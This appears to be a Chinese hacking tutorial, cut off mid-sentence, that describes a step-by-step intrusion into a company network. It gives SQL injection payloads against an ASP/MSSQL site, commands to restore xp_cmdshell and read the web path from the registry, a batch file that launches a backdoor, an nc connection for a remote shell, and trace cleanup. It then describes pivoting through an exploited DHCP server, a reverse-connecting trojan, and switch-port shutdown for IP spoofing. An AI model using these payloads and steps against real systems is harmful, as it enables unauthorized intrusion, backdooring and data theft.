入侵内网一般过程Word文档下载推荐.docx

1、.asp。很快找到一个类似http:/www.*.com/news/show1.asp?NewsId=125272页面，在后面加上and 1=1 、and 1=2前者正常，后者反回如下错误。Microsoft OLE DB Provider for ODBC Driver error 80040e14 MicrosoftODBC SQL Server DriverSQL ServerUnclosed quotation mark before the character sting”./news/show/show1.asp，行59是IIS+MSSQL+ASP的站，在来提交：http:News

2、Id=125272 and 1=（select is_srvrolemember（sysadmin）NewsId=125272 and sa=（select system_user）结果全部正常，正常是说明是当前连接的账号是以最高权限的SA运行的，看一下经典的“sp_cmdshell”扩展存储是否存在，如果存在那就是初战告捷。NewsId=125272 and 1=（select count（*） from master.dbo.sysobjects where xtype = x and name = xp_cmdshell）失败，看看是否可以利用xplog70.dll恢复，在提交：News

3、Id=125272;exec master.dbo.sp_addextendedproc ,xplog70.dll在试一下xp_cmdshell是否恢复了，又失败了，看样管理是把xp_cmdshell和xplog70.dll删除了，想利用xp_cmdshell“下载”我们的木马现在是不可能的。首先我们先要得到一个WEB Shell，上传xplog70.dll，恢复xp_cmdshell在利用xp_cmdshell运行我们上传的木马，这都是大众入侵思路了，前辈们以经无数人用这个方法入侵成功。拿出NBSI扫一下，一会后台用户名和密码是出来了，可是后台登录地址扫不出来，测试了N个工具、手工测试也没结

4、果，有可能管理员把后台删除了。我们想办法得到网站的目录，这时就须要用到xp_regread、sp_makewebtask两个扩展存储，试一下是否存在：NewsId=125272and 1=（select count（*） from master.dbo.sysobjects where name = xp_regreadNewsId=125272and 1=（select count（*） from master.dbo.sysobjects where xtype=X and name = sp_makewebtask全部返回正常说明存在（一般的网管不太了解他们，存在也很正常），首先简单介绍

5、一下xp_regread扩展存储过程及sp_makewebtask Web助手存储过程，xp_regread是用来读取注册表信息的，我们可以通过这个来得到保存在注册表中的Web绝对路径。sp_makewebtask这个就是我们用来得到WEB Shell的，主要功能就是导出数据库中表的记录为文件。这个方法网上很早就出现了，我们网站的目录在注册表里是在HKEY_LOCAL_MACHINE,SYSTEMControlSet001ServicesW3SVCParameters，我们在数据库里建一个表，将他存储在表里，在使数据库错误回显在IE里。create table dbo.biao（zhichar

6、（255）;这时候我们就建了一个名为biao的表，并添加了一个类型为char长度是255的字段，名为zhi，然后添加数据：declare result varchar（255） exec master.dbo.xpregreadHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtual Roots/, result output insert into biao （zhi） values（result）;-然后暴出WEB绝对路径：NewsId=125272 and 1=（select count（*） from bia

7、o where zhi1）IE返回错误，得到网站的物理路径e:inetputweb，向网站目标写个小网页木马，一个朋友以前写过一个程序，由于只是内部用的，我就不抓图了，网上早就有发布过这种工具，有兴趣下载自己看看吧！原理都是一样的，如果想手工输入就是麻烦了点，但可以向网站脚本文件写入“一句话木马”在远程提交，以得到一个大马的目的。登录木马后把自己机器的xplog70.dll上传到网站目录在传一个hackers door，黑客之门只有一个dll，我们要建一个批处理，名子为run.bat：echo offrundll32 kernel,DllRegisterServer svchost.exede

8、l run.bat在拿一下文件合并器，将我们建的批处理和dll文件合并成一个exe文件，黑客之门的使用方法我就不多说了，他有详细的使用手册，建议在处理一下，以免传到服务器上被查杀。黑客之门主要用处是可以利用服务器上所开的任何端口和我通信，现在恢复他的xp_cmdshell扩展存储：,e:inetputwebxplog70.dll;在IE里提交：exec master.dbo.xp_cmdshell e:inetputwebrootkit.exe rootkit.exe是黑客之门改的名子，注意这个程序要解绑到系统目录如图1。木马运行后，Nc vv ip 80 输入密码就得到一个CMD Shell

9、，在放一个隐藏的asp木马，简单的把入侵的痕迹清理一下。以上的方法很早就有了，由于网上资料也很多、本文主要说渗透内网，篇幅有限我就不过多解释了。渗透内网这个网络很大共有七个网管，现在当前位置是F网、朋友在B网、目标在A网。朋友给的资料，目前接入internet的两台设备未知（假设未知的设备都是路由器），图2是该公司大体的网络拓扑图。掌握B网所有设备用户名密码（朋友之前嗅探到的）。除A网其它网络可以自由通信， A网内有公司重要信息所以不像其它网，它是不允许任何人访问的，路由不给予转发数据，也就是只进不出的网络，虽然现在的网络是外紧内松，但是想进入目标主机还是有些难度。怎么跨过设备的限制到达目标呢

10、！您还要向下看。现在首要的目的就是让router3给我们转发数据包。首先尝试telnet登录路由，拒绝访问不能登录，我想也不能登录，应该是访问控制列表限制了。现在我们首要目标拿下router3的控制权，为什么目标定位在router3呢！我们现在知道他的登录密码；我当前位置可以和B网直接通信；Router3是A、B网络公用的，应该两个网管都有权限登录；这一点也是最重要的，只有router3给予数据转发才可以和目标主机通信；个人认为router3是最佳路线，现在假设一下，如果B网管理员所管理的设备只有他本身所用的IP或TFTP Server（兼DHCP Server）才可以登录设置，那么有如下思路

11、可以完成入侵。一般来说管理员主机一定可以登录这台路由器的，网管主机都不可以登录设备那么谁为维护网络呢！1、直接得到B网管理员主机的一个CMD Shell来登录设备。2、得到管理员同网段一台主机的CMD Shell，从而利用ARP欺骗来telnet目标路由。3、得到B网其它网段中可访问外部网络一台主机的CDM Shell，伪装CDM Shell主机IP地址，必要情况伪装IP+MAC地址来欺骗路由器，（机会高达到50%）。经过分析拿B网的DHCP服务器（172.16.101.25）开始，选择突破点也是很重要的，DHCP服务器为了提供这个网段的服务他是暴露在相对外部的，而且不在VLAN的管辖中，还和

12、网管在同一交换机下，而且听朋友说他们公司PC几乎不打补丁，还有很多员工不知补丁为何物，这也给入侵带来及大的方便。利用服务器的WEB木马上传一些流行的溢出程序，直接拿个溢出程序溢出他的DHCP服务器，（最后才知道2003年的溢出程序对这个主机都有用）成功得到一个System权限的CMD Shell。革命尚未成功，同志们还须努力啊！“下载”我们肉鸡一个反弹的木马，我们的肉鸡是不能主动连接DHCP服务的，好像有点费话。现在这个主机就是我们在内网的一个接入点，放弃我们刚才控制的那个WEB主机，利用反弹木马开的个CMD。telnet一下路由，%connection closed by remote ho

13、st!还是连接失败，不能登录路由器，看样只有172.16.101.15这台主机（管理员IP）可以登录了，我们看一下登录他的交换机OK不（一般工作组交换机权限设置不会那么BT）。telnet 172.16.101.253 /交换机管理地址Password:centerenable成功登录，show mac-access、show cdp neighbors、show arp一些命令判断管理员对应的结口，管理员的IP对应的是FastEthernet 7/1，这个时候要用到IP地址的欺骗，在此感谢EST长的最难看的哥哥。#interface FastEthernet 7/1 #shutdown当然，这要等网管离开的时候才可以，这就要内外结合了。这个时候172.16.101.15这台主机在网络上以消失了，我们试一